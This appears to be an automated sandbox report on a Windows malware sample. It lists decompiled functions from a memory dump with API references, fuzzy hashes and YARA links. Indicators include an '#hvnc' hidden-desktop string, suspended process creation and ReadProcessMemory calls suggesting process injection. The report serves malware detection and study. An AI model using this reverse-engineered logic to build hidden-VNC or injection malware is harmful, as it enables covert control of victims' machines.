Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$PrintRedrawSleep
String ID:
API String ID: 1013652024-0
Opcode ID: f48becbb382c6ec564d7d7cd3857b9db3436958c281b933e297a415aed1c67c2
Instruction ID: 0b5f61c6b7ce10f85ff42fd8efb7a8870c4d0ba5420711417b44e84061550a66
Opcode Fuzzy Hash: f48becbb382c6ec564d7d7cd3857b9db3436958c281b933e297a415aed1c67c2
Instruction Fuzzy Hash: 52016221314BA082F7249F1BA880B1E7774FB88FC0F958025EF5A83B24CE39C5568709

Uniqueness

Uniqueness Score: -1.00%

Function 00C7EE38, Relevance: 6.0, APIs: 4, Instructions: 29windowCOMMON

Download Yara Rule

APIs

CreateBitmap.GDI32 ref: 00C7EE58
CreatePatternBrush.GDI32 ref: 00C7EE64
DeleteObject.GDI32 ref: 00C7EE74
GetStockObject.GDI32 ref: 00C7EE7F

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateObject$BitmapBrushDeletePatternStock
String ID:
API String ID: 247950882-0
Opcode ID: fbd72e68dee3bb9d9613acd2f11248c368d21638cb039d86f87925839b3a5438
Instruction ID: 071ceeb6d485c69a93ec53e766b9cf8a9e9120e60ce9b5a4485ad12e62316954
Opcode Fuzzy Hash: fbd72e68dee3bb9d9613acd2f11248c368d21638cb039d86f87925839b3a5438
Instruction Fuzzy Hash: C9F0B238705B4296FB148B65F858B6933A5B748B50F808238DA4E83BA0EF3C855EC709

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E6EC, Relevance: 6.0, APIs: 4, Instructions: 28threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 00C7E703
GetCurrentProcessId.KERNEL32 ref: 00C7E70F
PostMessageA.USER32 ref: 00C7E728
PostThreadMessageA.USER32 ref: 00C7E73A

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessagePostProcessThread$CurrentWindow
String ID:
API String ID: 791361056-0
Opcode ID: bdc928c0b539d365fd630b75a229f0f97326912bd15685cfdde784c6e6d7dc61
Instruction ID: 0650827d829ad8f9ce61abd0293d833d5926b9825203aedf7a5b9066dbfbac15
Opcode Fuzzy Hash: bdc928c0b539d365fd630b75a229f0f97326912bd15685cfdde784c6e6d7dc61
Instruction Fuzzy Hash: 41F05833220B8187F7648B24F891F5A7261F789785F98A530EA6646E58DF38C998CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B650, Relevance: 6.0, APIs: 4, Instructions: 28
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00C7B650(void* __edx, void* __eflags, void* __rcx) {
				void* _v56;
				void* __rbx;
				long _t10;
				void* _t18;
				void* _t19;
				void* _t26;

				_t19 = __rcx;
				SetThreadDesktop(??);
				_t10 = E00C7B290(__edx, _t18, __rcx, __rcx, _t26);
				if(_t10 == 0) {
					 *(_t19 + 0x220) = 1;
					while( *((intOrPtr*)(_t19 + 0x224)) == 0) {
						r9d = 0;
						r8d = 0;
						_t10 = GetMessageA(??, ??, ??, ??);
						if(_t10 == 0) {
							break;
						}
						TranslateMessage();
						_t10 = DispatchMessageA(??);
					}
					 *(_t19 + 0x220) =  *(_t19 + 0x220) & 0x00000000;
					return _t10;
				}
				return _t10;
			}

0x00c7b656
0x00c7b660
0x00c7b669
0x00c7b670
0x00c7b672
0x00c7b6ab
0x00c7b67e
0x00c7b686
0x00c7b68b
0x00c7b693
0x00000000
0x00000000
0x00c7b69a
0x00c7b6a5
0x00c7b6a5
0x00c7b6b4
0x00000000
0x00c7b6b4
0x00c7b6c0

APIs

SetThreadDesktop.USER32 ref: 00C7B660

Part of subcall function 00C7B290: SetWindowLongPtrA.USER32 ref: 00C7B308

GetMessageA.USER32 ref: 00C7B68B
TranslateMessage.USER32 ref: 00C7B69A
DispatchMessageA.USER32 ref: 00C7B6A5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Message$DesktopDispatchLongThreadTranslateWindow
String ID:
API String ID: 2425733056-0
Opcode ID: baecf8bf0c18c2995f3c4041deccb9cf531d0737bc3339354839140ff32036b0
Instruction ID: 59279c7d0a6c4b6cb3e8ace42eec1517d6c40243e0759768857b3a187fdb1be8
Opcode Fuzzy Hash: baecf8bf0c18c2995f3c4041deccb9cf531d0737bc3339354839140ff32036b0
Instruction Fuzzy Hash: 3DF05E72610541D3FB24AF71E858B6A3370F7A8B09F9C8230EA5E45964DF38C98DC708

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A914, Relevance: 6.0, APIs: 4, Instructions: 27memorysynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32 ref: 00C7A939
WaitForSingleObject.KERNEL32(?,?,00000000,00C76899), ref: 00C7A94B
CloseHandle.KERNEL32(?,?,00000000,00C76899), ref: 00C7A955
HeapFree.KERNEL32(?,?,00000000,00C76899), ref: 00C7A967

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseFreeHandleHeapMessageObjectPostSingleThreadWait
String ID:
API String ID: 1797912655-0
Opcode ID: c616e90da385d56ac4a1fa86674a4e27149f87433ec362b95568232a1cf552a9
Instruction ID: ce1d2a595d9e20eab22dd7fffa35f522bf7a2a9eab7956cf174b8ce94c996dab
Opcode Fuzzy Hash: c616e90da385d56ac4a1fa86674a4e27149f87433ec362b95568232a1cf552a9
Instruction Fuzzy Hash: 91F01236612B4082FF18DF72E854B693321EBC4F55F58C6148E2A06AA4CF38D99AC755

Uniqueness

Uniqueness Score: -1.00%

Function 00C764E4, Relevance: 6.0, APIs: 4, Instructions: 25stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32 ref: 00C764FC
lstrcatA.KERNEL32 ref: 00C7650E
lstrcatA.KERNEL32 ref: 00C76524
CreateEventA.KERNEL32 ref: 00C76538

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$CreateEventlstrcpy
String ID:
API String ID: 3695347688-0
Opcode ID: b182eaf9ddd73962192087f4c85a83136e21478fc6dd5697bd04ff6606cfa6b5
Instruction ID: 114beeddb6a5f8f41d04277e2f7eb1b49c50fa38f15114f4da3bf8858fa17ba3
Opcode Fuzzy Hash: b182eaf9ddd73962192087f4c85a83136e21478fc6dd5697bd04ff6606cfa6b5
Instruction Fuzzy Hash: 6AF0FEB631094A93FF259B24E895BDE2321FB48759F808227954E46964DF3CC64DC744

Uniqueness

Uniqueness Score: -1.00%

Function 00C76CE0, Relevance: 6.0, APIs: 4, Instructions: 25stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32 ref: 00C76CF8
lstrcatA.KERNEL32 ref: 00C76D0A
lstrcatA.KERNEL32 ref: 00C76D20
CreateEventA.KERNEL32 ref: 00C76D34

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$CreateEventlstrcpy
String ID:
API String ID: 3695347688-0
Opcode ID: 3f9b447d7d13add017840ab49204b8261739b9f434c5a7c7d1ddc9914c7f2723
Instruction ID: 68516ddc8f118e246dbab92039671b8ab273aebcec7b093548dadc54166a0157
Opcode Fuzzy Hash: 3f9b447d7d13add017840ab49204b8261739b9f434c5a7c7d1ddc9914c7f2723
Instruction Fuzzy Hash: 36F05EB231090A93FF348B24E854B9A2321FB48758F808223954E46964DF3CC24DC744

Uniqueness

Uniqueness Score: -1.00%

Function 00C826F8, Relevance: 6.0, APIs: 4, Instructions: 23synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32 ref: 00C82719
WaitForSingleObject.KERNEL32 ref: 00C82729
CloseHandle.KERNEL32 ref: 00C82736
DeleteCriticalSection.KERNEL32 ref: 00C82757

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseCriticalDeleteHandleMessageObjectPostSectionSingleThreadWait
String ID:
API String ID: 3840051195-0
Opcode ID: bfcb56a2d90d0420cdb67d8af8efd1f50d670b84af6ee7061c6f5b586b9b295b
Instruction ID: 6f846afa69dd8e3c719a12184e912413731d91f16bf541e2bcadebc311f1e917
Opcode Fuzzy Hash: bfcb56a2d90d0420cdb67d8af8efd1f50d670b84af6ee7061c6f5b586b9b295b
Instruction Fuzzy Hash: F7F01236611A8482FB109F75D89DBA93361FB94F5DF584230CE25095A5CF34449AC718

Uniqueness

Uniqueness Score: -1.00%

Function 00C822AC, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00C822AC(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed char _v32;
				signed int _v36;
				void* _v68;
				char _v72;
				void* __rdi;
				intOrPtr _t34;
				signed int _t40;
				signed int _t44;
				signed int _t50;
				signed int _t53;
				void* _t67;
				void* _t69;
				intOrPtr* _t71;
				void* _t79;
				long long _t91;
				void* _t95;
				void* _t100;

				_t105 = __r9;
				_t96 = __rsi;
				_t70 = __rbx;
				_t69 = __rax;
				_t56 = __edx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t95 = __rcx;
				E00C7F480(__rbx, __rcx);
				r8d = 0;
				_t34 = E00C82424(__edx, _t69, _t70, _t95, _t69, __rsi, __rbp, __r8, __r9);
				_t71 =  *((intOrPtr*)(_t95 + 0x1d0));
				_t57 = _t71;
				if(_t71 != 0) {
					_t5 = _t95 + 0x88; // 0x88
					_t100 = _t5;
					do {
						E00C81D90(_t57, _t69, _t71, _t95, _t71, _t96);
						_v72 = 0x3c;
						_t96 =  *_t71;
						if(E00C7C050(_t69, _t71, _t100, _t96, _t96) == 0 || GetWindowInfo() == 0) {
							r8d = 0;
							__eflags = r8d;
							_t34 = E00C81C90(_t54, _t71, _t95, _t95, _t96, _t100, _t105);
							_t71 =  *((intOrPtr*)(_t95 + 0x1d0));
						} else {
							_t91 = _t96;
							_t79 = _t100;
							_t40 = _v32 >> 0x00000003 & 0x00000001;
							 *(_t71 + 0x2c) = _t40;
							if(_t40 != 0) {
								_t44 =  !(E00C7BB64(_t69, _t71, _t79, _t91, _t105) >> 7) & 0x00000001;
								__eflags = _t44;
								goto L17;
							} else {
								_t50 = E00C7BB64(_t69, _t71, _t79, _t91, _t105) >> 0x00000003 & 0x00000001;
								 *(_t71 + 0x2c) = _t50;
								if(_t50 == 0) {
									if((_v32 & 0x00000080) == 0 || (_v36 & 0x40000000) == 0) {
										_t53 = 0;
										__eflags = 0;
									} else {
										_t53 = 1;
									}
									 *(_t71 + 0x2c) = _t53;
								}
								_t64 =  *(_t71 + 0x2c);
								if( *(_t71 + 0x2c) == 0) {
									if(E00C7C0C0(_t64, _t69, _t71, _t100,  *_t71, _t96) == 0) {
										L15:
										_t44 = 0;
									} else {
										E00C7F480(_t71, _t95);
										if( *_t71 != _t69) {
											goto L15;
										} else {
											_t44 = 1;
										}
									}
									L17:
									 *(_t71 + 0x2c) = _t44;
								}
							}
							r8d = 0x10;
							memcpy(??, ??, ??);
							E00C821C8(_t56, _t71, _t95, _t71, _t96);
							_t67 = E00C7C134(_t71, _t96);
							_t54 = 0 | _t67 == 0x00000000;
							 *(_t71 + 0x18) = _t67 == 0;
							_t34 = E00C7BE8C( &_v72);
							 *((intOrPtr*)(_t71 + 0x14)) = _t34;
							_t71 =  *((intOrPtr*)(_t71 + 0x38));
						}
					} while (_t71 != 0);
				}
				return _t34;
			}

0x00c822ac
0x00c822ac
0x00c822ac
0x00c822ac
0x00c822ac
0x00c822ac
0x00c822b1
0x00c822b6
0x00c822c0
0x00c822c3
0x00c822cb
0x00c822d1
0x00c822d6
0x00c822dd
0x00c822e0
0x00c822e6
0x00c822e6
0x00c822ed
0x00c822f3
0x00c822f8
0x00c82303
0x00c82310
0x00c823ef
0x00c823ef
0x00c823f8
0x00c823fd
0x00c8232c
0x00c82330
0x00c82336
0x00c82339
0x00c8233c
0x00c8233f
0x00c823a5
0x00c823a5
0x00000000
0x00c82341
0x00c82349
0x00c8234c
0x00c8234f
0x00c82356
0x00c82369
0x00c82369
0x00c82362
0x00c82362
0x00c82362
0x00c8236b
0x00c8236b
0x00c8236e
0x00c82372
0x00c82381
0x00c82397
0x00c82397
0x00c82383
0x00c82386
0x00c8238e
0x00000000
0x00c82390
0x00c82390
0x00c82390
0x00c8238e
0x00c823a8
0x00c823a8
0x00c823a8
0x00c82372
0x00c823af
0x00c823ba
0x00c823c5
0x00c823d4
0x00c823d6
0x00c823d9
0x00c823e1
0x00c823e6
0x00c823e9
0x00c823e9
0x00c82404
0x00c822ed
0x00c82422

APIs

Part of subcall function 00C82424: EnterCriticalSection.KERNEL32 ref: 00C8246A
Part of subcall function 00C82424: LeaveCriticalSection.KERNEL32 ref: 00C82527

Part of subcall function 00C81D90: GetWindow.USER32 ref: 00C81DAD

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

GetWindowInfo.USER32 ref: 00C8231E
memcpy.NTDLL ref: 00C823BA

Part of subcall function 00C7BB64: GetParent.USER32 ref: 00C7BCA4

Strings

<, xrefs: 00C822F8

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$CriticalSection$AncestorEnterInfoLeaveParentmemcpy
String ID: <
API String ID: 4287079213-4251816714
Opcode ID: ac1a6207e7630e2fa460a872bb139aaaa16357cb7dbdb376a3a67c290a94e6f2
Instruction ID: 370c1024406bae2bed168fe06a37d3da31547f059ffa9132f631de7a45a5e15e
Opcode Fuzzy Hash: ac1a6207e7630e2fa460a872bb139aaaa16357cb7dbdb376a3a67c290a94e6f2
Instruction Fuzzy Hash: 8A31C272304A4086DB24EF36D45936E63A8F749FCCF488025EE1987B18DF2CC942DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00C631C8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00C631C8(void* __ecx, void* __edx, void* __ebp, long long __rbx, signed long long __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _v32;
				char _v40;
				void* __r12;
				void* _t20;
				void* _t22;
				void* _t23;
				char _t27;
				void* _t28;
				intOrPtr _t33;
				void* _t36;
				void* _t37;
				void* _t42;
				long long _t46;
				signed long long _t51;
				signed long long _t62;
				signed long long _t64;
				intOrPtr _t69;
				void* _t71;
				signed long long _t72;
				void* _t74;
				WCHAR* _t76;
				void* _t77;

				_t59 = __rsi;
				_t57 = __rdi;
				_t46 = __rbx;
				_t38 = __ebp;
				_t28 = __ecx;
				_t45 = _t64;
				 *((long long*)(_t45 + 8)) = __rbx;
				 *((long long*)(_t45 + 0x10)) = __rbp;
				 *((long long*)(_t45 + 0x18)) = __rsi;
				 *((long long*)(_t45 + 0x20)) = __rdi;
				_t62 = __rcx;
				r14d = r9d;
				_t77 = __r8;
				_t37 = __edx;
				GetModuleHandleW(_t76);
				r8d = 0;
				_t72 = _t45;
				_t20 = E00C632B4(r14d, __ebp, __rbx, __r8, __rdi, __rsi, __rcx, __r8, _t72, _t74, _t71);
				_t27 = 0;
				_t36 = _t20;
				if(_t20 == 0) {
					_v32 = _t46;
					_v40 = 0;
					_t22 = GetCurrentProcess();
					_t51 = _t45;
					_t23 = E00C64A4C(_t22, _t45, _t46, _t51,  &_v32, _t62,  &_v40);
					_t36 = _t23;
					if(_t23 != 0) {
						E00C62CD0(_t28, r14d, _t46, _t77, _t59);
					} else {
						_t33 = _v40;
						if(_t33 != 0) {
							do {
								_t45 = _v32;
								_t69 =  *((intOrPtr*)(_v32 + _t51 * 8));
								_t42 = _t69 -  *0xc95688; // 0xc60000
								if(_t42 != 0 && _t69 != _t72) {
									_t51 = _t62;
									E00C632B4(_t37, _t38, _t46, _t51, _t57, _t59, _t62, _t69, _t72);
									_t33 = _v40;
								}
								_t27 = _t27 + 1;
							} while (_t27 < _t33);
						}
						E00C61E84();
						E00C63374(_t37, _t45, _t46, _t62, _t59, _t62);
					}
				}
				return _t36;
			}

0x00c631c8
0x00c631c8
0x00c631c8
0x00c631c8
0x00c631c8
0x00c631c8
0x00c631cb
0x00c631cf
0x00c631d3
0x00c631d7
0x00c631e5
0x00c631e8
0x00c631f2
0x00c631f5
0x00c631f7
0x00c631fd
0x00c63206
0x00c63209
0x00c6320e
0x00c63210
0x00c63214
0x00c63216
0x00c6321b
0x00c6321f
0x00c63225
0x00c63232
0x00c63237
0x00c6323b
0x00c6328e
0x00c6323d
0x00c6323d
0x00c63243
0x00c63245
0x00c63245
0x00c6324c
0x00c63250
0x00c63257
0x00c63260
0x00c63263
0x00c63268
0x00c63268
0x00c6326c
0x00c6326e
0x00c63245
0x00c63277
0x00c63281
0x00c63281
0x00c6323b
0x00c632b3

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00C618B2,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C631F7

Part of subcall function 00C632B4: GetModuleHandleA.KERNEL32(?,?,00000004,00C6320E,?,?,?,?,?,00C618B2,?,?,?,00C61F7A), ref: 00C632F6

GetCurrentProcess.KERNEL32(?,?,?,?,?,00C618B2,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C6321F

Strings

ADVAPI32.DLL, xrefs: 00C631EB

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleModule$CurrentProcess
String ID: ADVAPI32.DLL
API String ID: 2298500976-33758204
Opcode ID: a448143bbdba2bc3cf407356ea0b42f9986c86b99d7ef4f9b864355493b20f06
Instruction ID: 6df0de90f213e73fc98a67ca1ba14ab47b522fd35a62bb4cc9ecbf2280c60274
Opcode Fuzzy Hash: a448143bbdba2bc3cf407356ea0b42f9986c86b99d7ef4f9b864355493b20f06
Instruction Fuzzy Hash: 2221D732704B9186DB309F56E8D031AB761F7C8FC4F584222AE8D57716CE38CA46C744

Uniqueness

Uniqueness Score: -1.00%

Function 00C618C8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00C618C8(void* __edx, void* __eflags, long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, intOrPtr _a40, signed int _a48, long long _a56, long long _a64, long long _a72, long long _a80) {
				void* _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				signed int _v64;
				intOrPtr _v72;
				void* _t25;
				void* _t27;
				void* _t30;
				void* _t31;
				long long* _t35;
				void* _t48;
				void* _t51;
				void* _t62;
				long long* _t63;
				void* _t65;

				_t35 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t51 = __r9;
				_t65 = __rdx;
				_t27 = 0;
				GetModuleHandleW(??);
				E00C64B0C(_t30, _t31, __rax, __rbx, __rax, "CreateProcessA");
				_t63 = _t35;
				if(_t35 != 0) {
					_t62 = _t51;
					r8d = _a48;
					_t48 = _t65;
					_t49 = _a80;
					r8d = r8d | 0x00000004;
					_v32 = _a80;
					_v40 = _a72;
					_v48 = _a64;
					_v56 = _a56;
					_v64 = r8d;
					_v72 = _a40;
					_t25 =  *_t63();
					_t27 = _t25;
					if(_t25 != 0) {
						r8d = 1;
						E00C614F8(_a48, _t31, _t49, _t48, __r8, _t62);
					}
				}
				return _t27;
			}

0x00c618c8
0x00c618c8
0x00c618cd
0x00c618d2
0x00c618e3
0x00c618f0
0x00c618f3
0x00c618f5
0x00c61905
0x00c6190a
0x00c61910
0x00c6191a
0x00c6191d
0x00c61925
0x00c61928
0x00c61930
0x00c61934
0x00c6193c
0x00c61949
0x00c61956
0x00c61962
0x00c6196a
0x00c6196e
0x00c61971
0x00c61975
0x00c6197e
0x00c61987
0x00c61987
0x00c61975
0x00c619a7

APIs

GetModuleHandleW.KERNEL32 ref: 00C618F5

Part of subcall function 00C64B0C: CreateFileA.KERNEL32 ref: 00C64B82
Part of subcall function 00C64B0C: SetFilePointer.KERNEL32 ref: 00C64B9C
Part of subcall function 00C64B0C: ReadFile.KERNEL32 ref: 00C64BC2
Part of subcall function 00C64B0C: CloseHandle.KERNEL32 ref: 00C64BE3

Part of subcall function 00C614F8: memset.NTDLL ref: 00C6152B
Part of subcall function 00C614F8: ReadProcessMemory.KERNEL32 ref: 00C615BA
Part of subcall function 00C614F8: ReadProcessMemory.KERNEL32 ref: 00C615E5
Part of subcall function 00C614F8: ReadProcessMemory.KERNEL32 ref: 00C61637
Part of subcall function 00C614F8: ReadProcessMemory.KERNEL32 ref: 00C61671

Strings

CreateProcessA, xrefs: 00C618FE
KERNEL32.DLL, xrefs: 00C618E6

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Read$MemoryProcess$File$Handle$CloseCreateModulePointermemset
String ID: CreateProcessA$KERNEL32.DLL
API String ID: 671254618-1218825259
Opcode ID: a8ee269e1e50c6c2cea735b85db4ea29fb83acd7fe862deee5ce252c5eb939bf
Instruction ID: 8ff072843a6f4279a54280199c0ac1614946b15737ce9b1863a6efaae4f6bbf2
Opcode Fuzzy Hash: a8ee269e1e50c6c2cea735b85db4ea29fb83acd7fe862deee5ce252c5eb939bf
Instruction Fuzzy Hash: F1113736318B808AD760CB12F880B9AB7A4F788BD0F588525EE8C43B19DF39C545CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C68054, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00C68086
RtlCompareUnicodeString.NTDLL ref: 00C680A0

Strings

\ThemeApiPort, xrefs: 00C6807B

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: StringUnicode$CompareInit
String ID: \ThemeApiPort
API String ID: 2360956377-4099707584
Opcode ID: e1e8cc18aee7b1e519954776ce5b83c942aac4cb9db243cc113e578a1bb78b7b
Instruction ID: 13793d81ed8b827fe18058a05d80f35dc4ffe1723f91a695c7c5b01f912d6f7e
Opcode Fuzzy Hash: e1e8cc18aee7b1e519954776ce5b83c942aac4cb9db243cc113e578a1bb78b7b
Instruction Fuzzy Hash: 32112A36204F8485EA208B16F88475AB364F798FD4F488225EE8D87B29DF38C555CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C82150, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7B9E4: GetClassNameA.USER32 ref: 00C7B9F6

GetWindowTextA.USER32 ref: 00C82193
lstrcmpA.KERNEL32 ref: 00C821A5

Strings

#hvnc, xrefs: 00C82199

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClassNameTextWindowlstrcmp
String ID: #hvnc
API String ID: 876077961-3244826380
Opcode ID: ba365d1018cdf7add8b23b40c1ca27cd25252d9bc59d3a52f8cd87c46010c9af
Instruction ID: 1b250f5b1ea8d925fcbbb71bfa4c857ba78e88056c818628ca8c0bbb3fa630c0
Opcode Fuzzy Hash: ba365d1018cdf7add8b23b40c1ca27cd25252d9bc59d3a52f8cd87c46010c9af
Instruction Fuzzy Hash: CDF0F03230868582EB209F19E6C87AC2370F344BC8F9481399B4842625CF38CA4A8B04

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BF00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 00C7BF36
lstrcmpiA.KERNEL32(?,?,?,?,00000000,00C699DE), ref: 00C7BF4C

Strings

#32770, xrefs: 00C7BF45

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClassNamelstrcmpi
String ID: #32770
API String ID: 1927859406-463685578
Opcode ID: 4ce52cd7cf3a2d8017cf7f87db631fca651daa3e09f2453241d83787d13757d0
Instruction ID: 578f04d5a8bca4e7f7993c14f95ddc98b536dedece8e5d4f1109fdb4ddbf1e04
Opcode Fuzzy Hash: 4ce52cd7cf3a2d8017cf7f87db631fca651daa3e09f2453241d83787d13757d0
